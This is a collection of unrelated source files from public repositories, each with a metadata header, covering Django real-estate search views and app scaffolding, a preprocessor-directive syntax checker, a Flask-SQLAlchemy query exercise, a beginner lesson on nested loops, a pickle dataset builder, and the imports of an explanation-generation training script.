b53b9f640ad10415e33abfda982af3f7d1d2238d | 23320e9258952cdfb40574c8543e240d63aa98ec | /realestate/views.py | 7d80304129a4dfe18d45f169ec97bbbb764ae775 | [] | no_license | ijij41/realestate | 615d5007500c474626cfd3c3fdacfa628dde85d2 | 4ecbd7b13b96c3aa6564fd1ee9f1571f61ed3d5f | refs/heads/master | 2020-12-24T12:39:49.017435 | 2018-05-27T15:17:15 | 2018-05-27T15:17:15 | 72,969,056 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,212 | py | # from django.shortcuts import render
#
# # Create your viewclass here.
# from django.viewclass.generic import TemplateView
#
import json
import datetime
from django.views.decorators.csrf import csrf_exempt
from django.core import serializers
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.http import HttpResponseRedirect
from django.http import JsonResponse
from django.shortcuts import render
from django.urls import reverse
from django.views.generic import ListView, DetailView
from realestate.models import Deal, Address
def index(request):
if request.user.is_authenticated():
return HttpResponseRedirect(reverse("realestate:main"))
else:
return HttpResponseRedirect(reverse("realestate:login"))
class LV(ListView):
model = Deal
template_name = "pages/search.html"
paginate_by = 3
# class DV(DetailView):
# model = Deal;
# template_name = "pages/detail.html"
def detail(request,bldg_cd):
deallist = Deal.objects.filter(bldg_cd=bldg_cd).order_by('deal_date');
return render(request, 'pages/detail.html', {'deal_list': deallist})
#########################################################################
#for ajax
def get_address_do(request, query_id, query_key):
leads_as_json = get_address(query_id, query_key)
return JsonResponse(leads_as_json) # in case of using custom dic
@csrf_exempt
def get_search(request): ## main function for search
result_as_json = get_search_result(request)
print result_as_json
return JsonResponse(result_as_json) #in case of coverting query set to json
########################################################################
#private function
# def get_search_result(request, page_num):
def get_search_result(request):
########## for debug ##################
# print request.is_ajax()
# print request.method
# print request.body
# print type(request)
#
# print request.__dict__
# print type(request)
# print type(request.body)
# print request
# print "POST:", request.POST
# print "GET:", request.GET
# print "body:", request.body
#
# print "1POst request value", request.POST['si_code']
########################################
house_type = request.POST['house_type']
deal_type = request.POST['deal_type']
si_code = request.POST['si_code']
gu_code = request.POST['gu_code']
dong_code = request.POST['dong_code']
start_year = int(request.POST['start_year'])
start_quarter = int(request.POST['start_quarter'])
end_year = int(request.POST['end_year'])
end_quarter = int(request.POST['end_quarter'])
# https: // datatables.net / manual / server - side # Sent-parameters
# for pagination
table_data_para_start = int(request.POST['start'])
table_data_para_length = int(request.POST['length'])
cur_page = table_data_para_start/table_data_para_length + 1
# 1 1 2 4 3 7 4 10
# year_range = [start_year, end_year],
# https: // stackoverflow.com / questions / 4668619 / django - database - query - how - to - filter - objects - by - date - range
# post_list = Deal.objects.all().filter(house_type=house_type, deal_type=deal_type,
# # si_code = si_code, gu_code=gu_code, dong_code=dong_code,
# deal_date__gte=datetime.date(start_year, (start_quarter*3)-2, 1),deal_date__lte=datetime.date(end_year, (end_quarter*3)-1, 1))
# post_list = Deal.objects.all().filter(deal_date__gte=datetime.date(start_year, (start_quarter*3)-2, 1),deal_date__lte=datetime.date(end_year, (end_quarter*3)-1, 1))
print start_quarter
print end_quarter
# print "start date:" ,datetime.date(start_year, (start_quarter * 3) - 2, 1)
if((((end_quarter + 1) * 3) - 2 ) > 12 ):
end_time = datetime.date(end_year+1, 1, 1)
else:
end_time = datetime.date(end_year, ((end_quarter + 1) * 3) - 2, 1)
print "end date:", end_time
post_list = Deal.objects.filter(deal_date__gte=datetime.date(start_year, (start_quarter * 3) - 2, 1), deal_date__lt=end_time, ).order_by('deal_date')
print post_list.query
#test
# print Deal.objects.filter(year=2016, period=1, dealtype=2).query
# post_list = Deal.objects.filter(year=2016,period=1,dealtype=2)
print "original entry count:", len(post_list)
if(not house_type=='0'):
post_list = post_list.filter(housetype=house_type)
print "select house_type:", house_type, len(post_list)
if(not deal_type=='0'):
post_list = post_list.filter(dealtype=deal_type)
print "select deal_type:", deal_type, len(post_list)
if(not si_code=='0'):
post_list = post_list.filter(sidocode=si_code)
print "select si_code:", si_code, len(post_list)
if (not gu_code == '0'):
post_list = post_list.filter(guguncode=gu_code)
print "select gu_code:", gu_code, len(post_list)
if (not dong_code == '0'):
post_list = post_list.filter(dongcode=dong_code)
print "select dong_code:", dong_code, len(post_list)
# print 'get:', post_list
print "-----------------"
print type(house_type),house_type
print type(deal_type), deal_type
print type(si_code),si_code
print type(gu_code), gu_code
print type(dong_code), dong_code
print "-----------------"
print "filtered entry count:", len(post_list)
# print "test1:", post_list[0].address.si_code
# print "test2:", post_list[0].address.si_name
# num_content_per_page = 10
num_content_per_page = table_data_para_length
paginator = Paginator(post_list, num_content_per_page)
# cur_page = page_num # page_num from url does not be needed because we will use start, length parameter provided from tabledata
try:
contacts = paginator.page(cur_page)
except PageNotAnInteger:
# If page is not an integer, deliver first page.
contacts = paginator.page(1)
cur_page = 1
except EmptyPage:
# If page is out of range (e.g. 9999), deliver last page of results.
contacts = paginator.page(paginator.num_pages)
# general paginate
# page_list = [1, 2, 3, 4, 5]
# previous_page = 0
# next_page = 6
# context = {}
# context['object_list'] = contacts
# context['object_list'] = contacts.object_list
#
# context['page_list'] = page_list #
# context['previous_page'] = previous_page
# context['next_page'] = next_page #
# context['current_page'] = int(cur_page)
# case 1
# test = {'data': [{'content':"aaa",'page_info':{'page_list':[1,2,3,4],'prev_page':0,'next_page':5,'cur_page':3}}] }
# return JsonResponse(test)
# case 2
# data = serializers.serialize("json",contacts.object_list)
# d = ast.literal_eval(data)
# return HttpResponse(data,content_type='application/json')
# case 3
# data = serializers.serialize("json", contacts.object_list)
# context['object_list'] = data
# return JsonResponse(context)
# case 4
# data = serializers.serialize("json", contacts.object_list)
# # context['data'] = data
# # return JsonResponse(context)
# About json http://pythonstudy.xyz/python/article/205-JSON-%EB%8D%B0%EC%9D%B4%ED%83%80
# according to page request, send data (e.g., 2 page reuqest, send page 2 data
data = serializers.serialize("json", contacts.object_list)
dict_data = json.loads(data)
#update from forienkey
for de, pl in zip(dict_data, post_list):
de['fields']['address'] = pl.get_address
#TODO recordsFiltered processing
return {"recordsTotal": post_list.count(), "recordsFiltered": post_list.count(), 'data':dict_data}
def get_address(query_id, query_key):
if (query_id == 'si'):
data_list = Address.objects.all().values('si_code', 'si_name').distinct()
elif (query_id == 'gu'):
data_list = Address.objects.all().values('gu_code', 'gu_name').distinct().filter(
gu_code__startswith=query_key)
elif (query_id == 'dong'):
data_list = Address.objects.all().values('dong_code', 'dong_name').distinct().filter(
dong_code__startswith=query_key)
# c = serializers.serialize('json',data_list,field=('si_code','si_name'))
# print process_data_list
# data_list = [ entry for entry in data_list ] #default for json
process_data_list = []
for entry in data_list:
t_dic = {}
if (query_id == 'si'):
t_dic['code'] = entry['si_code']
t_dic['name'] = entry['si_name']
elif (query_id == 'gu'):
t_dic['code'] = entry['gu_code']
t_dic['name'] = entry['gu_name']
elif (query_id == 'dong'):
t_dic['code'] = entry['dong_code']
t_dic['name'] = entry['dong_name']
process_data_list.append(t_dic)
# process_data_list = serializers.serialize('json',process_data_list)
# return {'data':data_list}
return {'data': process_data_list}
#######################################################################
def init_db_test(request):
data_list = Deal.objects.filter(dongcode=1168010300)[:7]
print "data count: ", len(data_list)
print "data count: ", data_list
print "data count: ", data_list.count
context = {'test_list': data_list}
return render(request, 'realestate/ref_show_data.html', context)
def store_data_db_test(request):
addr = Address(si_code=1, si_name='test', gu_code=2, gu_name="gu_test", dong_code=3, dong_name="dong_test")
addr.save()
print "store data db test"
return render(request, 'realestate/db_insert_done.html')
#
# def signup(request):
# if request.method == "POST":
# userform = UserCreationForm(request.POST)
# if userform.is_valid():
# userform.save()
# return HttpResponseRedirect(reverse("realestate:signup_ok"))
#
# elif request.method == "GET":
# userform = UserCreationForm()
#
# return render(request, "registration/signup.html",{"userform":userform})
# def session_confirm(request):
# print User.get_full_name()
# return None
| [
"ijij41@gmail.com"
] | ijij41@gmail.com |
9eda040374e9676cb11302a44cf81830252b90b8 | 137231b721e0e1d356defc8d649e28c31ef98339 | /resources/git/check_syntax.py | 6441fda3f4aeb0919c44feae3e9a1b16eb7b1308 | [
"Apache-2.0"
] | permissive | devopsec/dsiprouter | 779702b002f95b85a20dda6863966f3b0d0ad1b4 | bab487af5b8460f4da085d4feebeb8dd9b4a572a | refs/heads/master | 2021-04-15T05:45:56.669896 | 2020-11-20T22:52:51 | 2020-11-20T22:52:51 | 126,534,604 | 0 | 0 | Apache-2.0 | 2020-11-20T22:52:52 | 2018-03-23T20:15:16 | HTML | UTF-8 | Python | false | false | 5,198 | py | #!/usr/bin/env python3
import os, sys, re, subprocess, shutil
# TODO: add support for other basic preprocessor checks (c/kamcfg)
# TODO: add support for missing semi-colon / dangling curly brace (c/kamcfg)
# TODO: add support for recursing through kamcfg include files (kamcfg)
# global config variables
project_root = subprocess.Popen(['git', 'rev-parse', '--show-toplevel'], universal_newlines=True,
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).communicate()[0].strip()
if len(project_root) == 0:
project_root = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))
# find C src files in project
matched_csrc_files = subprocess.Popen(['find', project_root, '-type', 'f', '-regextype', 'posix-extended', '-regex', '.*\.(cpp|hpp|c|h)$'],
universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).communicate()[0].strip().split()
# find kamailio .cfg files in project
shell_pipe = subprocess.Popen(['find', project_root, '-type', 'f', '-name', '*.cfg', '-print0'],
stdout=subprocess.PIPE, stderr=subprocess.DEVNULL).stdout
matched_kamcfg_files = subprocess.Popen(['xargs', '-0', 'sh', '-c', 'for arg do sed -n "/^\#\!KAMAILIO/q 0;q 1" ${arg} && echo "${arg}"; done', '_'],
universal_newlines=True, stdin=shell_pipe, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL
).communicate()[0].strip().split()
files_found = len(matched_csrc_files) + len(matched_kamcfg_files)
term_width = shutil.get_terminal_size((80, 24))[0]
# global constants
CSRC_STYLE_IFDEF_REGEX = re.compile(rb'^\#if(?:n?def)?')
CSRC_STYLE_ENDIF_REGEX = re.compile(rb'^\#endif')
KAMCFG_STYLE_IFDEF_REGEX = re.compile(rb'^\#if(?:n?def)?')
KAMCFG_STYLE_ENDIF_REGEX = re.compile(rb'^\#endif')
# holds state for entire test
test_succeeded = True
files_checked = 0
# holds state for current file check
current_file = '<no file selected>'
unmatched_ifdefs = []
unmatched_endifs = []
# check for common syntax errors, currently supported checks:
# + preprocessor statement closure
def haveValidSyntax(test_files, syntax='c-src'):
global files_checked, current_file, unmatched_ifdefs, unmatched_endifs
if syntax == 'c-src':
ifdef_regex = CSRC_STYLE_IFDEF_REGEX
endif_regex = CSRC_STYLE_ENDIF_REGEX
elif syntax == 'kam-cfg':
ifdef_regex = KAMCFG_STYLE_IFDEF_REGEX
endif_regex = KAMCFG_STYLE_ENDIF_REGEX
else:
return False
for test_file in test_files:
current_file = test_file
with open(test_file, 'rb') as fp:
i = 1
for line in fp:
if ifdef_regex.match(line):
unmatched_ifdefs.append(i)
elif endif_regex.match(line):
try:
unmatched_ifdefs.pop()
except IndexError:
unmatched_endifs.append(i)
i += 1
files_checked += 1
if len(unmatched_ifdefs) != 0 or len(unmatched_endifs) != 0:
return False
return True
# print summary of test results
def printSummary():
print('|', '='*(term_width-2), '|', sep='')
if test_succeeded:
print('Test Result: PASSED')
else:
print('Test Result: FAILED')
print('Number Of Files Tested: {}'.format(str(files_checked)))
print('Number Of Files Matched: {}'.format(str(files_found)))
print('|', '='*(term_width-2), '|', sep='')
# print detailed failure info
def printErrorInfo():
if not test_succeeded:
if len(unmatched_ifdefs) != 0:
header = 'unmatched ifdefs'
header_len = len(header)
avail_space = term_width - 4 - header_len
header_fill = '=' * (int(avail_space / 2))
header_pad = '=' * (avail_space % 2)
print('|', header_fill, ' '+header+' ', header_fill, header_pad, '|', sep='')
for i in unmatched_ifdefs:
print('{}: line {}'.format(current_file, str(i)), file=sys.stderr)
print('|', '='*(term_width-2), '|', sep='', file=sys.stderr)
if len(unmatched_endifs) != 0:
header = 'unmatched endifs'
header_len = len(header)
avail_space = term_width - 4 - header_len
header_fill = '=' * (int(avail_space / 2))
header_pad = '=' * (avail_space % 2)
print('|', header_fill, ' '+header+' ', header_fill, header_pad, '|', sep='')
for i in unmatched_endifs:
print('{}: line {}'.format(current_file, str(i)), file=sys.stderr)
print('|', '='*(term_width-2), '|', sep='', file=sys.stderr)
# wrapper for the final cleanup
def printResultsAndExit():
printSummary()
printErrorInfo()
sys.exit(int(test_succeeded == False))
# main testing logic
if not haveValidSyntax(matched_csrc_files, syntax='c-src'):
test_succeeded = False
elif not haveValidSyntax(matched_kamcfg_files, syntax='kam-cfg'):
test_succeeded = False
printResultsAndExit()
| [
"tmoore@goflyball.com"
] | tmoore@goflyball.com |
016a771a9a4e9cd6058b345ad25e460998ce2d0a | 78e67caaeb0b6416980c94134b03fa1346205caf | /als/asgi.py | 377726f521b04d55054d6ef3fd60b44c0e042887 | [] | no_license | AhtenYa/alsurlshortener | 91a5838e777b4e0651ad590b146ec882da170f31 | 7b5bac0825c651fdad82a311b7338f13fdf94c23 | refs/heads/main | 2023-07-23T22:58:51.708808 | 2021-09-04T13:06:43 | 2021-09-04T13:06:43 | 368,159,188 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | """
ASGI config for als project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'als.settings')
application = get_asgi_application()
| [
"68775649+AhtenYa@users.noreply.github.com"
] | 68775649+AhtenYa@users.noreply.github.com |
1a23c95c125ef6b9e88bdbe0a914ea803ebafe87 | 9c8801d1a76f37f89671721c346c1911d4197dc1 | /myprofile/urls.py | adfbded9301605158106c79bc5dc9584d8256237 | [] | no_license | hawkeyes64/myproject | 4cc401d7ea57b4b3104c7036bac2bcc42e359476 | 539268817e5dad249471a3508d30973ccaecf5f4 | refs/heads/master | 2021-01-12T09:03:41.300568 | 2017-07-03T16:01:45 | 2017-07-03T16:01:45 | 76,749,005 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 145 | py | from django.conf.urls import url
from myprofile import views
app_name = 'myprofile'
urlpatterns = [
url(r'^', views.index, name='index'),
] | [
"wiz.hawkeye64@gmail.com"
] | wiz.hawkeye64@gmail.com |
437df5749492caa79d2bc5ad46c1efce9d4aa163 | b4ef95cc0a33477893ff5322246bba877318bec0 | /blog/models.py | 1da647f996053c5c2cc340832e3d502d69a89243 | [] | no_license | sikiyo2333/blog_project | c5a2ace9d95d407c8b40c162b0d79d484814cd3b | 13fd49d44a6371ac2df2d06ed1c723537dfb62f5 | refs/heads/master | 2016-09-13T12:07:01.437303 | 2016-05-19T11:23:18 | 2016-05-19T11:23:18 | 59,199,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,451 | py | # coding=utf-8
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class UserProfile(models.Model):
user = models.OneToOneField(User)
# website = models.URLField(blank=True)
picture = models.ImageField(upload_to='static/profile_images', blank=True)
def __unicode__(self):
return self.user.username
class Article(models.Model):
title = models.CharField(max_length=128, null=True)
summary = models.CharField(max_length=128, null=True)
body = models.TextField()
datetime = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(UserProfile)
# picture = models.ImageField(upload_to = 'img')
def __unicode__(self):
return self.title
class Comment(models.Model):
body = models.TextField()
datetime = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(UserProfile)
article = models.ForeignKey(Article)
def __unicode__(self):
return str(self.id)
class News(models.Model): # 新闻表
myurl = models.URLField(max_length=256, null=True) # 来源
picture = models.CharField(max_length=100, null=True) # picture_path
title = models.CharField(max_length=128, unique=True) # 标题
date = models.CharField(max_length=100, null=True) # 生成时间
summary = models.CharField(max_length=100, unique=True) # 概要
def __unicode__(self):
return self.title
| [
"sikiyoo@foxmail.com"
] | sikiyoo@foxmail.com |
66a26920f92185b4242b11c4be51229f86e92299 | e38324a95a3e639afe711476a7cff77c56199bab | /manage.py | 5107fe55cfc70cc993af2b2c40b6da4b0118330c | [] | no_license | sonnenkorona/django_amazon_translate | 30d91e751e447302f5bd1032ac9212340540b345 | b7eaa739aa1202ea0df6e94101e4bbb2911c1f5c | refs/heads/master | 2023-04-12T02:03:08.020708 | 2021-04-15T14:36:07 | 2021-04-15T14:36:07 | 358,287,503 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 670 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'translate_test.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"sonnenkorona@gmail.com"
] | sonnenkorona@gmail.com |
ef0a52a17359b8870ff5afc4a0872d753e9664ba | 1d970480c377f0011b2407804840cbf382792447 | /before_large_application_architecture/db_practice2.py | 990a2e597c0d6573b50f77fa858ec00eeefe828d | [] | no_license | EminentStar/flask-web-oreily | 1893f1d04e2dc11a9901bc5ea26ab84748643a8c | 2f0362daed76102506f256c5a30d27fbc7f61f4b | refs/heads/master | 2021-01-09T05:25:25.877741 | 2017-07-02T22:45:03 | 2017-07-02T22:45:03 | 80,765,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,392 | py | from hello import db
from hello import Role, User
"""
Flask-SQLAlchemy는 각 모델 클래스에서 사용 가능한 query 오브젝트를 생성
"""
# 모델을 위한 가장 기본적 ㄱ쿼리는 그에 대응 하는 테이블의 전체 내용을 리턴하는 것
result = Role.query.all()
print("Role.query.all()")
print(result)
result = User.query.all()
print("User.query.all()")
print(result)
user_role = result[0].role
# 쿼리 오브젝트는 filters를 통해 더 정확한 데이터베이스 검색을 실행하도록 설정함.
# "User" 규칙에 할당된 모든 사용자를 검색
result = User.query.filter_by(role=user_role).all()
print('User.query.filter_by(role=user_role).all()')
print(result)
result = User.query.filter().all()
print('User.query.filter().all()')
print(result)
result = User.query.limit(2).all()
print('User.query.limit(2)')
print(result)
result = User.query.filter_by(role=user_role).first()
print('User.query.filter_by(role=user_role).first()')
print(result)
"""
result = User.query.filter_by(username="test").first_or_404()
print('User.query.filter_by(username="test").first()_or_404')
print(result)
"""
result = User.query.filter_by(role=user_role).count()
print('User.query.filter_by(role=user_role).count()')
print(result)
result = User.query.filter().get(1)
print("User.query.filter().get(1)")
print(result)
"""
result = User.query.filter().get_or_404(5)
print("User.query.filter().get_or_404(5)")
print(result)
"""
"""
# user_role.users 쿼리는 사용자의 리스트를 리턴하기 위해 user_role.users 표현이
# 내부적으로 all()의 호출을 실행할 때 묵시적으로 쿼리가 실행됨
# 그래서 쿼리 오브젝트가 숨겨져 있기 때문에 추가적인 쿼리 필터를 이용하여 개선하는 것을 불가능
users = user_role.users
print(users)
result = user_role.users.order_by(User.username).all() # ERROR!
print('user_role.users.order_by(User.username).all()')
print(result)
"""
"""
# 이걸 해결하기 위해, 관계 설정은 쿼리가 자동으로 실행되지 않도록 리퀘스트하기 위해
# lazy='dynamic'인수로 수정(Role model)
"""
users = user_role.users
print(users)
result = user_role.users.order_by(User.username).all()
print('user_role.users.order_by(User.username).all()')
print(result)
result = user_role.users.count()
print('user_role.users.count()')
print(result)
| [
"junk3843@naver.com"
] | junk3843@naver.com |
546ad423f29df454ce30baa4898f5be35eef9929 | 4eb2b57b1b8f3b68ce44b8a5a967f34d10563b74 | /SimpleFit/api/migrations/0053_auto_20161211_1453.py | 46bc0a58c87f9386fcba490908978f1f9c9d6b9b | [] | no_license | dlellis/SimpleFit | 4c87b2ca682ccc383af78c1edc3447cae208c217 | d38a093d15248685abe0531e34852fe5ae5d692b | refs/heads/master | 2021-05-01T16:30:39.875103 | 2016-12-13T18:09:56 | 2016-12-13T18:09:56 | 71,318,209 | 0 | 3 | null | 2016-12-13T17:54:34 | 2016-10-19T04:15:43 | JavaScript | UTF-8 | Python | false | false | 1,041 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-11 14:53
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0052_ecategory_exercise'),
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default=None, max_length=30)),
],
),
migrations.RemoveField(
model_name='exercise',
name='ecategory',
),
migrations.RemoveField(
model_name='exercise',
name='exname',
),
migrations.AddField(
model_name='exercise',
name='name',
field=models.CharField(default=None, max_length=30),
),
migrations.DeleteModel(
name='ECategory',
),
]
| [
"dlellis@unomaha.edu"
] | dlellis@unomaha.edu |
c2a27aebcb39aa364b36e6be6aca69661fe432b4 | 67e4328bd6f0a47aeddd280f2b2a226ada88ef6d | /GUI/static/pickles/create.py | b8b8a09f56b783b0ce66d291daaeddc0638621b8 | [] | no_license | venkat201097/Multimodal | 6a4bb51185086951a5b046ef3c5f5fdced42da29 | 75935db16a8059fb970b78e5cd95f241a5fb7d27 | refs/heads/master | 2020-09-03T12:04:27.532354 | 2020-08-22T05:14:34 | 2020-08-22T05:14:34 | 219,426,213 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,329 | py | import numpy as np
import random
import os
import pickle
buckets = pickle.load(open('buckets.pkl','rb'))
images = pickle.load(open('images.pkl','rb'))
audios = pickle.load(open('audios.pkl','rb'))
#train = pickle.load(open('train_local.pkl','rb'))
img2lab = pickle.load(open('img2lab.pkl','rb'))
#print(train)
for i in images:
images[i] = ['static/images/'+j.split('/')[-1] for j in images[i]]
for i in audios:
audios[i] = ['static/audios/{}/{}'.format(j.split('/')[-2],j.split('/')[-1]) for j in audios[i]]
train2 = []
tempimg0 = []
tempaud0 = []
tempimg3 = []
tempaud3 = []
for x,k in enumerate([1,2,3,1,2,3]):
temp = []
for j in range(k):
for i in buckets[x]:
a = random.sample(images[i],1)[0]
print(a)
del images[i][images[i].index(a)]
b = random.sample(audios[img2lab[i]],1)[0]
del audios[img2lab[i]][audios[img2lab[i]].index(b)]
temp.append((a,b))
if x==0:
tempimg0.append([a])
tempaud0.append([b])
if x==3:
tempimg3.append([a])
tempaud3.append([b])
train2.append(temp)
imgtest = []
audtest = []
for z,bucket in enumerate(buckets):
tempimg = []
tempaud = []
for i in bucket:
a = random.sample(images[i],1)[0]
del images[i][images[i].index(a)]
b = random.sample(audios[img2lab[i]],1)[0]
del audios[img2lab[i]][audios[img2lab[i]].index(b)]
tempimg.append([a,b])
a = random.sample(images[i],1)[0]
del images[i][images[i].index(a)]
b = random.sample(audios[img2lab[i]],1)[0]
del audios[img2lab[i]][audios[img2lab[i]].index(b)]
tempaud.append([b,a])
for x,i in enumerate(bucket):
for y,j in enumerate(random.sample(bucket[:x]+bucket[x+1:],9)):
b = random.sample(audios[img2lab[j]],1)[0]
# del audios[img2lab[j]][audios[img2lab[j]].index(b)]
tempimg[x].append(b)
for y,j in enumerate(random.sample(bucket[:x]+bucket[x+1:],9)):
a = random.sample(images[j],1)[0]
# del images[j][images[j].index(a)]
tempaud[x].append(a)
tempimg[x][1:] = random.sample(tempimg[x][1:],len(tempimg[x][1:]))
tempaud[x][1:] = random.sample(tempaud[x][1:],len(tempaud[x][1:]))
if z==0:
for x,i in enumerate(bucket):
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
b = random.sample(audios[img2lab[j]],1)[0]
# del audios[img2lab[j]][audios[img2lab[j]].index(b)]
tempimg0[x].append(b)
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
a = random.sample(images[j],1)[0]
# del images[j][images[j].index(a)]
tempaud0[x].append(a)
tempimg0[x][1:] = random.sample(tempimg[x][1:],len(tempimg0[x][1:]))
tempaud0[x][1:] = random.sample(tempaud[x][1:],len(tempaud0[x][1:]))
tempimg += tempimg0
tempaud += tempaud0
if z==3:
for x,i in enumerate(bucket):
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
b = random.sample(audios[img2lab[j]],1)[0]
# del audios[img2lab[j]][audios[img2lab[j]].index(b)]
tempimg3[x].append(b)
for y,j in enumerate(random.sample(bucket[:x]+bucket[x:],10)):
a = random.sample(images[j],1)[0]
# del images[j][images[j].index(a)]
tempaud3[x].append(a)
tempimg3[x][1:] = random.sample(tempimg[x][1:],len(tempimg3[x][1:]))
tempaud3[x][1:] = random.sample(tempaud[x][1:],len(tempaud3[x][1:]))
tempimg += tempimg3
tempaud += tempaud3
imgtest.append([tuple(i) for i in tempimg])
audtest.append([tuple(i) for i in tempaud])
with open('imgtest.pkl','wb+') as fp:
pickle.dump(imgtest,fp)
with open('audtest.pkl','wb+') as fp:
pickle.dump(audtest,fp)
with open('train.pkl','wb+') as fp:
pickle.dump(train2,fp)
def gen():
for i in [56,2,6,7,2,5,8,9,4,2,21,4,7]:
yield i
for i in [67,2,56,68,24]:
yield i
| [
"venkat201097@gmail.com"
] | venkat201097@gmail.com |
fcf1f8608278a54122b87c6d5a57e67e6a09ef64 | 59f769b1b097e5a9ea87fded206fe48f114e496a | /Unit2-LoopsAndLists/lesson5-NestedLoops.py | c7c07fe9e38af1370ade8713a2c766656b8b575c | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | JoshOrndorff/LearnPythonByExample | 78c3336b29653f5c5ffd226cc24e64ab360919a4 | bb4376249203938ed71e9bc59da35d7ddb3fd73f | refs/heads/master | 2021-01-10T16:37:29.724093 | 2018-06-11T16:14:17 | 2018-06-11T16:14:17 | 51,013,960 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,482 | py | # Create two empty lists. Both of which will be populated with numbers
numbers = []
otherNumbers = []
print("Tell three numbers.")
# Use the range function to loop three times.
# The looping variable i will iterate through the numbers 0, 1, 2
# But I'll never use them. It is okay to use a simple variable name like i
# when you are just looping through integers.
for i in range(3):
number = int(input("> "))
numbers.append(number)
# The same loop to get three more numbers for the second list.
print("Tell me three more numbers.")
for i in range(3):
number = int(input("> "))
otherNumbers.append(number)
# We'll check whether any of the numbers appear in both lists. Since we haven't
# started yet, we haven't foudn any matches yet. I'll make a variable to
# represent that.
matchFound = False
# I'll also make counters for each loop. You'll use these in the exercises.
outerLoopCounter = 0
innerLoopCounter = 0
# In order to do this we have to compare each number in the first list with each
# number in the second list. The word 'each' usually indicates that you'll want
# to use a for loop.
for number in numbers:
# This outer loop will loop us through each item in the first loop.
# For a given number in the first list, we will need to compare to each item
# in the second list. So we need to loop through the second list as well.
for otherNumber in otherNumbers:
# Now that we have selected a number from each list, we just compare them.
if number == otherNumber:
matchFound = True
# Now that we have compared all the possibilities, we just have to tell the user
# whether there were any matches. Note that matchFound is a Boolean, so I don't
# neem to use a comparison operator (eg. don't have to use matchFound == True).
if matchFound:
print("There was overlap between the lists.")
else:
print("There was no overlap between the lists.")
# Here we'll show how many times each loop ran. These won't work until you
# complete exercise 1.
#print("The outer loop ran {} times.".format(outerLoopCounter))
#print("The inner loop ran {} times.".format(innerLoopCounter))
# ---------------- Exercises -----------------
# 1. I made counter variables to keep track of how many times each loop ran.
# In order to make those counters work, increment the variables each time
# through the corresponding loop. Then uncomment lines 60 and 61 to see the
# results. Make predictions of what the results will be.
# 2. Right now the program just tells us whether there was any overlap, but does
# not tell us which numbers overlap. Make a new list called overlap, on line
# 4 and add all of the overlapping numbers to it.
# Then, at the end, tell us which numbers were in both lists.
# 3. This program has both lists the same length. Is that necessary? What if the
# first list is longer? Change the code so that the first list has five
# numbers. Predict whether it will still work, and how many times each loop
# will run.
# 4. ADVANCED: This program uses only two lists. Modify the program to have
# three lists, and discover whether any numbers were in all three.
# Making this change will change the line numbers, so my references might not
# make sense anymore.
# 5. ADVANCED: I use two different loops (on lines 11 and 17) to create the two
# original lists. These could also be combined into one nested loop. Modify
# these lines to use nested loops to take the input numbers.
| [
"admin@joshorndorff.com"
] | admin@joshorndorff.com |
dfdb47b1b83f8a4f7b1b93241c668962e9b6b4a1 | bd83af8c0bb98468d48b962ca302e36ec4dfbca7 | /eUG.py | 20b446d3e798dc92c3b26dba59e9fa830704e0b6 | [] | no_license | kochsnow/e-ViL | f1e31dc3ca844cc403c76cf8685d63e2cab24dcc | 94f17f5c189573c9d1087f82eb27db37690fc810 | refs/heads/main | 2023-08-28T03:54:37.237757 | 2021-10-11T16:14:08 | 2021-10-11T16:14:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,174 | py | # Copyright 2020 https://github.com/YIKUAN8/Transformers-VQA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import numpy as np
import collections
import torch
import torch.nn as nn
from torch.utils.data.dataloader import DataLoader
from tqdm import tqdm
from time import gmtime, strftime
from param import args
import random
import json
print(f"process ID: {os.getpid()}")
from transformers import get_linear_schedule_with_warmup
from datasets import load_metric
from tensorboardX import SummaryWriter
from src.nlg_eval import eval_nlp_scores, input_subset, get_nlg_scores
from eUG_model import eUGModel, binary_to_mp
from eViL_data import eViLDataset, eViLTorchDataset, VQAXEvaluator, bbox_collate
from eUG_generation import generate_text
from src.expl_tokenization import VCRGpt2Tokenizer
